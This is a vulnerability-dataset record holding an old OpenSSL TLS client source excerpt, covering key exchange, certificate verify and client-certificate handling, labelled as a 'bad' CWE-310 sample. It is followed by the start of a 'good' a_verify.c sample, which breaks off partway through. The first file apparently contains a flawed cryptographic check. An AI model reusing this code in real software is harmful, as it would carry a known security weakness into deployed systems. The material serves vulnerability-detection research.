if ((clnt_ecdh=EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
if (!EC_KEY_set_group(clnt_ecdh, srvr_group))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
if (ecdh_clnt_cert)
{
/* Reuse key info from our certificate.
* We only need our private key to perform
* the ECDH computation.
*/
const BIGNUM *priv_key;
tkey = s->cert->key->privatekey->pkey.ec;
priv_key = EC_KEY_get0_private_key(tkey);
if (priv_key == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
if (!EC_KEY_set_private_key(clnt_ecdh, priv_key))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
}
else
{
/* Generate a new ECDH key pair */
if (!(EC_KEY_generate_key(clnt_ecdh)))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_ECDH_LIB);
goto err;
}
}
/* use the 'p' output buffer for the ECDH key, but
* make sure to clear it out afterwards
*/
field_size = EC_GROUP_get_degree(srvr_group);
if (field_size <= 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
n=ECDH_compute_key(p, (field_size+7)/8, srvr_ecpoint, clnt_ecdh, NULL);
if (n <= 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_ECDH_LIB);
goto err;
}
/* generate master key from the result */
s->session->master_key_length = s->method->ssl3_enc \
-> generate_master_secret(s,
s->session->master_key,
p, n);
memset(p, 0, n); /* clean up */
if (ecdh_clnt_cert)
{
/* Send empty client key exch message */
n = 0;
}
else
{
/* First check the size of encoding and
* allocate memory accordingly.
*/
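/* This is the usual two-pass pattern for EC_POINT_point2oct(): the
* first call with a NULL buffer only returns the number of octets the
* uncompressed encoding needs, and the second call below writes the
* actual encoding into the freshly allocated buffer.
*/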
encoded_pt_len =
EC_POINT_point2oct(srvr_group,
EC_KEY_get0_public_key(clnt_ecdh),
POINT_CONVERSION_UNCOMPRESSED,
NULL, 0, NULL);
encodedPoint = (unsigned char *)
OPENSSL_malloc(encoded_pt_len *
sizeof(unsigned char));
bn_ctx = BN_CTX_new();
if ((encodedPoint == NULL) ||
(bn_ctx == NULL))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
/* Encode the public key */
n = EC_POINT_point2oct(srvr_group,
EC_KEY_get0_public_key(clnt_ecdh),
POINT_CONVERSION_UNCOMPRESSED,
encodedPoint, encoded_pt_len, bn_ctx);
*p = n; /* length of encoded point */
/* Encoded point will be copied here */
p += 1;
/* copy the point */
memcpy((unsigned char *)p, encodedPoint, n);
/* increment n to account for length field */
n += 1;
}
/* Free allocated memory */
BN_CTX_free(bn_ctx);
if (encodedPoint != NULL) OPENSSL_free(encodedPoint);
if (clnt_ecdh != NULL)
EC_KEY_free(clnt_ecdh);
EVP_PKEY_free(srvr_pub_pkey);
}
#endif /* !OPENSSL_NO_ECDH */
else if (alg_k & SSL_kGOST)
{
/* GOST key exchange message creation */
EVP_PKEY_CTX *pkey_ctx;
X509 *peer_cert;
size_t msglen;
unsigned int md_len;
int keytype;
unsigned char premaster_secret[32],shared_ukm[32], tmp[256];
EVP_MD_CTX *ukm_hash;
EVP_PKEY *pub_key;
/* Get server certificate PKEY and create ctx from it */
peer_cert=s->session->sess_cert->peer_pkeys[(keytype=SSL_PKEY_GOST01)].x509;
if (!peer_cert)
peer_cert=s->session->sess_cert->peer_pkeys[(keytype=SSL_PKEY_GOST94)].x509;
if (!peer_cert) {
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,SSL_R_NO_GOST_CERTIFICATE_SENT_BY_PEER);
goto err;
}
pkey_ctx=EVP_PKEY_CTX_new(pub_key=X509_get_pubkey(peer_cert),NULL);
/* If we have sent a certificate, and the certificate key
* parameters match those of the server certificate, use
* the certificate key for key exchange.
*/
/* Otherwise, generate ephemeral key pair */
EVP_PKEY_encrypt_init(pkey_ctx);
/* Generate session key */
RAND_bytes(premaster_secret,32);
/* If we have client certificate, use its secret as peer key */
if (s->s3->tmp.cert_req && s->cert->key->privatekey) {
if (EVP_PKEY_derive_set_peer(pkey_ctx,s->cert->key->privatekey) <=0) {
/* If there was an error, just ignore it. An ephemeral key
* will be used instead.
*/
ERR_clear_error();
}
}
/* Compute shared IV and store it in algorithm-specific
* context data */
ukm_hash = EVP_MD_CTX_create();
EVP_DigestInit(ukm_hash,EVP_get_digestbynid(NID_id_GostR3411_94));
EVP_DigestUpdate(ukm_hash,s->s3->client_random,SSL3_RANDOM_SIZE);
EVP_DigestUpdate(ukm_hash,s->s3->server_random,SSL3_RANDOM_SIZE);
EVP_DigestFinal_ex(ukm_hash, shared_ukm, &md_len);
EVP_MD_CTX_destroy(ukm_hash);
if (EVP_PKEY_CTX_ctrl(pkey_ctx,-1,EVP_PKEY_OP_ENCRYPT,EVP_PKEY_CTRL_SET_IV,
8,shared_ukm)<0) {
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
SSL_R_LIBRARY_BUG);
goto err;
}
/* Make GOST keytransport blob message */
/* Encapsulate it into a sequence */
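/* DER framing note: the tag byte below is 0x30 (SEQUENCE, constructed).
* Lengths under 0x80 use the short form (a single length byte); lengths
* of 0x80..0xff use the long form 0x81 <len>, which is why msglen >= 0x80
* costs one extra byte and n becomes msglen+3 instead of msglen+2.
*/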
*(p++)=V_ASN1_SEQUENCE | V_ASN1_CONSTRUCTED;
msglen=255;
if (EVP_PKEY_encrypt(pkey_ctx,tmp,&msglen,premaster_secret,32)<0) {
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
SSL_R_LIBRARY_BUG);
goto err;
}
if (msglen >= 0x80)
{
*(p++)=0x81;
*(p++)= msglen & 0xff;
n=msglen+3;
}
else
{
*(p++)= msglen & 0xff;
n=msglen+2;
}
memcpy(p, tmp, msglen);
/* Check if pubkey from client certificate was used */
if (EVP_PKEY_CTX_ctrl(pkey_ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 2, NULL) > 0)
{
/* Set flag "skip certificate verify" */
s->s3->flags |= TLS1_FLAGS_SKIP_CERT_VERIFY;
}
EVP_PKEY_CTX_free(pkey_ctx);
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,premaster_secret,32);
EVP_PKEY_free(pub_key);
}
#ifndef OPENSSL_NO_SRP
else if (alg_k & SSL_kSRP)
{
if (s->srp_ctx.A != NULL)
{
/* send off the data */
n=BN_num_bytes(s->srp_ctx.A);
s2n(n,p);
BN_bn2bin(s->srp_ctx.A,p);
n+=2;
}
else
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
if (s->session->srp_username != NULL)
OPENSSL_free(s->session->srp_username);
s->session->srp_username = BUF_strdup(s->srp_ctx.login);
if (s->session->srp_username == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto err;
}
if ((s->session->master_key_length = SRP_generate_client_master_secret(s,s->session->master_key))<0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
}
#endif
#ifndef OPENSSL_NO_PSK
else if (alg_k & SSL_kPSK)
{
/* The callback needs PSK_MAX_IDENTITY_LEN + 1 bytes
* to return a \0-terminated identity. The extra byte
* is used by us to simulate strnlen. */
char identity[PSK_MAX_IDENTITY_LEN + 2];
size_t identity_len;
unsigned char *t = NULL;
unsigned char psk_or_pre_ms[PSK_MAX_PSK_LEN*2+4];
unsigned int pre_ms_len = 0, psk_len = 0;
int psk_err = 1;
n = 0;
if (s->psk_client_callback == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_NO_CLIENT_CB);
goto err;
}
memset(identity, 0, sizeof(identity));
psk_len = s->psk_client_callback(s, s->ctx->psk_identity_hint,
identity, sizeof(identity) - 1,
psk_or_pre_ms, sizeof(psk_or_pre_ms));
if (psk_len > PSK_MAX_PSK_LEN)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto psk_err;
}
else if (psk_len == 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
SSL_R_PSK_IDENTITY_NOT_FOUND);
goto psk_err;
}
identity[PSK_MAX_IDENTITY_LEN + 1] = '\0';
identity_len = strlen(identity);
if (identity_len > PSK_MAX_IDENTITY_LEN)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto psk_err;
}
/* create PSK pre_master_secret */
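/* For plain PSK (RFC 4279, section 2) the premaster secret is laid out
* as: uint16 N, N zero octets, uint16 N, then the PSK itself, where N is
* the PSK length. The callback wrote the PSK at the start of
* psk_or_pre_ms, so it is first shifted up by psk_len+4 bytes and the
* two length fields plus the zero block are then filled in below.
*/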
pre_ms_len = 2+psk_len+2+psk_len;
t = psk_or_pre_ms;
memmove(psk_or_pre_ms+psk_len+4, psk_or_pre_ms, psk_len);
s2n(psk_len, t);
memset(t, 0, psk_len);
t+=psk_len;
s2n(psk_len, t);
if (s->session->psk_identity_hint != NULL)
OPENSSL_free(s->session->psk_identity_hint);
s->session->psk_identity_hint = BUF_strdup(s->ctx->psk_identity_hint);
if (s->ctx->psk_identity_hint != NULL &&
s->session->psk_identity_hint == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
if (s->session->psk_identity != NULL)
OPENSSL_free(s->session->psk_identity);
s->session->psk_identity = BUF_strdup(identity);
if (s->session->psk_identity == NULL)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_MALLOC_FAILURE);
goto psk_err;
}
s->session->master_key_length =
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
psk_or_pre_ms, pre_ms_len);
s2n(identity_len, p);
memcpy(p, identity, identity_len);
n = 2 + identity_len;
psk_err = 0;
psk_err:
OPENSSL_cleanse(identity, sizeof(identity));
OPENSSL_cleanse(psk_or_pre_ms, sizeof(psk_or_pre_ms));
if (psk_err != 0)
{
ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_HANDSHAKE_FAILURE);
goto err;
}
}
#endif
else
{
ssl3_send_alert(s, SSL3_AL_FATAL,
SSL_AD_HANDSHAKE_FAILURE);
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
ERR_R_INTERNAL_ERROR);
goto err;
}
ssl_set_handshake_header(s, SSL3_MT_CLIENT_KEY_EXCHANGE, n);
s->state=SSL3_ST_CW_KEY_EXCH_B;
}
/* SSL3_ST_CW_KEY_EXCH_B */
return ssl_do_write(s);
err:
#ifndef OPENSSL_NO_ECDH
BN_CTX_free(bn_ctx);
if (encodedPoint != NULL) OPENSSL_free(encodedPoint);
if (clnt_ecdh != NULL)
EC_KEY_free(clnt_ecdh);
EVP_PKEY_free(srvr_pub_pkey);
#endif
return(-1);
}
int ssl3_send_client_verify(SSL *s)
{
unsigned char *p;
unsigned char data[MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH];
EVP_PKEY *pkey;
EVP_PKEY_CTX *pctx=NULL;
EVP_MD_CTX mctx;
unsigned u=0;
unsigned long n;
int j;
EVP_MD_CTX_init(&mctx);
if (s->state == SSL3_ST_CW_CERT_VRFY_A)
{
p= ssl_handshake_start(s);
pkey=s->cert->key->privatekey;
/* Create context from key and test if sha1 is allowed as digest */
pctx = EVP_PKEY_CTX_new(pkey,NULL);
EVP_PKEY_sign_init(pctx);
if (EVP_PKEY_CTX_set_signature_md(pctx, EVP_sha1())>0)
{
if (!SSL_USE_SIGALGS(s))
s->method->ssl3_enc->cert_verify_mac(s,
NID_sha1,
&(data[MD5_DIGEST_LENGTH]));
}
else
{
ERR_clear_error();
}
/* For TLS v1.2 send signature algorithm and signature
* using agreed digest and cached handshake records.
*/
if (SSL_USE_SIGALGS(s))
{
long hdatalen = 0;
void *hdata;
const EVP_MD *md = s->cert->key->digest;
hdatalen = BIO_get_mem_data(s->s3->handshake_buffer,
&hdata);
if (hdatalen <= 0 || !tls12_get_sigandhash(p, pkey, md))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,
ERR_R_INTERNAL_ERROR);
goto err;
}
p += 2;
#ifdef SSL_DEBUG
fprintf(stderr, "Using TLS 1.2 with client alg %s\n",
EVP_MD_name(md));
#endif
if (!EVP_SignInit_ex(&mctx, md, NULL)
|| !EVP_SignUpdate(&mctx, hdata, hdatalen)
|| !EVP_SignFinal(&mctx, p + 2, &u, pkey))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,
ERR_R_EVP_LIB);
goto err;
}
s2n(u,p);
n = u + 4;
if (!ssl3_digest_cached_records(s))
goto err;
}
else
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA)
{
s->method->ssl3_enc->cert_verify_mac(s,
NID_md5,
&(data[0]));
if (RSA_sign(NID_md5_sha1, data,
MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH,
&(p[2]), &u, pkey->pkey.rsa) <= 0 )
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,ERR_R_RSA_LIB);
goto err;
}
s2n(u,p);
n=u+2;
}
else
#endif
#ifndef OPENSSL_NO_DSA
if (pkey->type == EVP_PKEY_DSA)
{
if (!DSA_sign(pkey->save_type,
&(data[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,&(p[2]),
(unsigned int *)&j,pkey->pkey.dsa))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,ERR_R_DSA_LIB);
goto err;
}
s2n(j,p);
n=j+2;
}
else
#endif
#ifndef OPENSSL_NO_ECDSA
if (pkey->type == EVP_PKEY_EC)
{
if (!ECDSA_sign(pkey->save_type,
&(data[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,&(p[2]),
(unsigned int *)&j,pkey->pkey.ec))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,
ERR_R_ECDSA_LIB);
goto err;
}
s2n(j,p);
n=j+2;
}
else
#endif
if (pkey->type == NID_id_GostR3410_94 || pkey->type == NID_id_GostR3410_2001)
{
unsigned char signbuf[64];
int i;
size_t sigsize=64;
s->method->ssl3_enc->cert_verify_mac(s,
NID_id_GostR3411_94,
data);
if (EVP_PKEY_sign(pctx, signbuf, &sigsize, data, 32) <= 0) {
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,
ERR_R_INTERNAL_ERROR);
goto err;
}
for (i=63,j=0; i>=0; j++, i--) {
p[2+j]=signbuf[i];
}
s2n(j,p);
n=j+2;
}
else
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY,ERR_R_INTERNAL_ERROR);
goto err;
}
ssl_set_handshake_header(s, SSL3_MT_CERTIFICATE_VERIFY, n);
s->state=SSL3_ST_CW_CERT_VRFY_B;
}
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_CTX_free(pctx);
return ssl_do_write(s);
err:
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_CTX_free(pctx);
return(-1);
}
/* Check that a certificate can be used for client authentication.
* Currently this checks that the cert exists, that we have a suitable
* digest for TLS 1.2, whether static DH client certificates can be
* used, and optionally checks suitability for Suite B.
*/
static int ssl3_check_client_certificate(SSL *s)
{
unsigned long alg_k;
if (!s->cert || !s->cert->key->x509 || !s->cert->key->privatekey)
return 0;
/* If there is no suitable signature algorithm we can't use the certificate */
if (SSL_USE_SIGALGS(s) && !s->cert->key->digest)
return 0;
/* If strict mode check suitability of chain before using it.
* This also adjusts suite B digest if necessary.
*/
if (s->cert->cert_flags & SSL_CERT_FLAGS_CHECK_TLS_STRICT &&
!tls1_check_chain(s, NULL, NULL, NULL, -2))
return 0;
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
/* See if we can use client certificate for fixed DH */
if (alg_k & (SSL_kDHr|SSL_kDHd))
{
SESS_CERT *scert = s->session->sess_cert;
int i = scert->peer_cert_type;
EVP_PKEY *clkey = NULL, *spkey = NULL;
clkey = s->cert->key->privatekey;
/* If the client key is not DH, assume it can be used */
if (EVP_PKEY_id(clkey) != EVP_PKEY_DH)
return 1;
if (i >= 0)
spkey = X509_get_pubkey(scert->peer_pkeys[i].x509);
if (spkey)
{
/* Compare server and client parameters */
i = EVP_PKEY_cmp_parameters(clkey, spkey);
EVP_PKEY_free(spkey);
if (i != 1)
return 0;
}
s->s3->flags |= TLS1_FLAGS_SKIP_CERT_VERIFY;
}
return 1;
}
int ssl3_send_client_certificate(SSL *s)
{
X509 *x509=NULL;
EVP_PKEY *pkey=NULL;
int i;
if (s->state == SSL3_ST_CW_CERT_A)
{
/* Let cert callback update client certificates if required */
if (s->cert->cert_cb)
{
i = s->cert->cert_cb(s, s->cert->cert_cb_arg);
if (i < 0)
{
s->rwstate=SSL_X509_LOOKUP;
return -1;
}
if (i == 0)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_INTERNAL_ERROR);
return 0;
}
s->rwstate=SSL_NOTHING;
}
if (ssl3_check_client_certificate(s))
s->state=SSL3_ST_CW_CERT_C;
else
s->state=SSL3_ST_CW_CERT_B;
}
/* We need to get a client cert */
if (s->state == SSL3_ST_CW_CERT_B)
{
/* If we get an error, we need to
* ssl->rwstate=SSL_X509_LOOKUP; return(-1);
* We then get retried later */
i=0;
i = ssl_do_client_cert_cb(s, &x509, &pkey);
if (i < 0)
{
s->rwstate=SSL_X509_LOOKUP;
return(-1);
}
s->rwstate=SSL_NOTHING;
if ((i == 1) && (pkey != NULL) && (x509 != NULL))
{
s->state=SSL3_ST_CW_CERT_B;
if ( !SSL_use_certificate(s,x509) ||
!SSL_use_PrivateKey(s,pkey))
i=0;
}
else if (i == 1)
{
i=0;
SSLerr(SSL_F_SSL3_SEND_CLIENT_CERTIFICATE,SSL_R_BAD_DATA_RETURNED_BY_CALLBACK);
}
if (x509 != NULL) X509_free(x509);
if (pkey != NULL) EVP_PKEY_free(pkey);
if (i && !ssl3_check_client_certificate(s))
i = 0;
if (i == 0)
{
if (s->version == SSL3_VERSION)
{
s->s3->tmp.cert_req=0;
ssl3_send_alert(s,SSL3_AL_WARNING,SSL_AD_NO_CERTIFICATE);
return(1);
}
else
{
s->s3->tmp.cert_req=2;
}
}
/* Ok, we have a cert */
s->state=SSL3_ST_CW_CERT_C;
}
if (s->state == SSL3_ST_CW_CERT_C)
{
s->state=SSL3_ST_CW_CERT_D;
if (!ssl3_output_cert_chain(s,
(s->s3->tmp.cert_req == 2)?NULL:s->cert->key))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_CERTIFICATE, ERR_R_INTERNAL_ERROR);
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_INTERNAL_ERROR);
return 0;
}
}
/* SSL3_ST_CW_CERT_D */
return ssl_do_write(s);
}
#define has_bits(i,m) (((i)&(m)) == (m))
int ssl3_check_cert_and_algorithm(SSL *s)
{
int i,idx;
long alg_k,alg_a;
EVP_PKEY *pkey=NULL;
SESS_CERT *sc;
#ifndef OPENSSL_NO_RSA
RSA *rsa;
#endif
#ifndef OPENSSL_NO_DH
DH *dh;
#endif
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
alg_a=s->s3->tmp.new_cipher->algorithm_auth;
/* we don't have a certificate */
if ((alg_a & (SSL_aNULL|SSL_aKRB5)) || (alg_k & SSL_kPSK))
return(1);
sc=s->session->sess_cert;
if (sc == NULL)
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,ERR_R_INTERNAL_ERROR);
goto err;
}
#ifndef OPENSSL_NO_RSA
rsa=s->session->sess_cert->peer_rsa_tmp;
#endif
#ifndef OPENSSL_NO_DH
dh=s->session->sess_cert->peer_dh_tmp;
#endif
/* This is the passed certificate */
idx=sc->peer_cert_type;
#ifndef OPENSSL_NO_ECDH
if (idx == SSL_PKEY_ECC)
{
if (ssl_check_srvr_ecc_cert_and_alg(sc->peer_pkeys[idx].x509,
s) == 0)
{ /* check failed */
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_BAD_ECC_CERT);
goto f_err;
}
else
{
return 1;
}
}
else if (alg_a & SSL_aECDSA)
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_ECDSA_SIGNING_CERT);
goto f_err;
}
else if (alg_k & (SSL_kECDHr|SSL_kECDHe))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_ECDH_CERT);
goto f_err;
}
#endif
pkey=X509_get_pubkey(sc->peer_pkeys[idx].x509);
i=X509_certificate_type(sc->peer_pkeys[idx].x509,pkey);
EVP_PKEY_free(pkey);
/* Check that we have a certificate if we require one */
if ((alg_a & SSL_aRSA) && !has_bits(i,EVP_PK_RSA|EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_RSA_SIGNING_CERT);
goto f_err;
}
#ifndef OPENSSL_NO_DSA
else if ((alg_a & SSL_aDSS) && !has_bits(i,EVP_PK_DSA|EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_DSA_SIGNING_CERT);
goto f_err;
}
#endif
#ifndef OPENSSL_NO_RSA
if ((alg_k & SSL_kRSA) &&
!(has_bits(i,EVP_PK_RSA|EVP_PKT_ENC) || (rsa != NULL)))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_RSA_ENCRYPTING_CERT);
goto f_err;
}
#endif
#ifndef OPENSSL_NO_DH
if ((alg_k & SSL_kDHE) &&
!(has_bits(i,EVP_PK_DH|EVP_PKT_EXCH) || (dh != NULL)))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_DH_KEY);
goto f_err;
}
else if ((alg_k & SSL_kDHr) && !SSL_USE_SIGALGS(s) &&
!has_bits(i,EVP_PK_DH|EVP_PKS_RSA))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_DH_RSA_CERT);
goto f_err;
}
#ifndef OPENSSL_NO_DSA
else if ((alg_k & SSL_kDHd) && !SSL_USE_SIGALGS(s) &&
!has_bits(i,EVP_PK_DH|EVP_PKS_DSA))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_DH_DSA_CERT);
goto f_err;
}
#endif
#endif
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) && !has_bits(i,EVP_PKT_EXP))
{
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
if (rsa == NULL
|| RSA_size(rsa)*8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_EXPORT_TMP_RSA_KEY);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_DH
if (alg_k & (SSL_kDHE|SSL_kDHr|SSL_kDHd))
{
if (dh == NULL
|| DH_size(dh)*8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher))
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_MISSING_EXPORT_TMP_DH_KEY);
goto f_err;
}
}
else
#endif
{
SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE);
goto f_err;
}
}
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_HANDSHAKE_FAILURE);
err:
return(0);
}
/* Check to see if handshake is full or resumed. Usually this is just a
* case of checking to see if a cache hit has occurred. In the case of
* session tickets we have to check the next message to be sure.
*/
#ifndef OPENSSL_NO_TLSEXT
# ifndef OPENSSL_NO_NEXTPROTONEG
int ssl3_send_next_proto(SSL *s)
{
unsigned int len, padding_len;
unsigned char *d;
if (s->state == SSL3_ST_CW_NEXT_PROTO_A)
{
len = s->next_proto_negotiated_len;
padding_len = 32 - ((len + 2) % 32);
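/* Layout of the NextProtocol message being built (NPN draft): a 4-byte
* handshake header (type plus 3-byte length), the selected protocol as a
* 1-byte length plus the protocol name, then the padding as a 1-byte
* length plus that many zero bytes; padding_len is chosen so that the
* message body (len + padding_len + 2) is a multiple of 32.
*/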
d = (unsigned char *)s->init_buf->data;
d[4] = len;
memcpy(d + 5, s->next_proto_negotiated, len);
d[5 + len] = padding_len;
memset(d + 6 + len, 0, padding_len);
*(d++)=SSL3_MT_NEXT_PROTO;
l2n3(2 + len + padding_len, d);
s->state = SSL3_ST_CW_NEXT_PROTO_B;
s->init_num = 4 + 2 + len + padding_len;
s->init_off = 0;
}
return ssl3_do_write(s, SSL3_RT_HANDSHAKE);
}
# endif
#endif
int ssl_do_client_cert_cb(SSL *s, X509 **px509, EVP_PKEY **ppkey)
{
int i = 0;
#ifndef OPENSSL_NO_ENGINE
if (s->ctx->client_cert_engine)
{
i = ENGINE_load_ssl_client_cert(s->ctx->client_cert_engine, s,
SSL_get_client_CA_list(s),
px509, ppkey, NULL, NULL, NULL);
if (i != 0)
return i;
}
#endif
if (s->ctx->client_cert_cb)
i = s->ctx->client_cert_cb(s,px509,ppkey);
return i;
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_2152_1 |
crossvul-cpp_data_good_2310_0 | /* crypto/asn1/a_verify.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <time.h>
#include "cryptlib.h"
#ifndef NO_SYS_TYPES_H
# include <sys/types.h>
#endif
#include <openssl/bn.h>
#include <openssl/x509.h>
#include <openssl/objects.h>
#include <openssl/buffer.h>
#include <openssl/evp.h>
#include "asn1_locl.h"
#ifndef NO_ASN1_OLD
int ASN1_verify(i2d_of_void *i2d, X509_ALGOR *a, ASN1_BIT_STRING *signature,
char *data, EVP_PKEY *pkey)
{
EVP_MD_CTX ctx;
const EVP_MD *type;
unsigned char *p,*buf_in=NULL;
int ret= -1,i,inl;
EVP_MD_CTX_init(&ctx);
i=OBJ_obj2nid(a->algorithm);
type=EVP_get_digestbyname(OBJ_nid2sn(i));
if (type == NULL)
{
ASN1err(ASN1_F_ASN1_VERIFY,ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
goto err;
}
if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7)
{
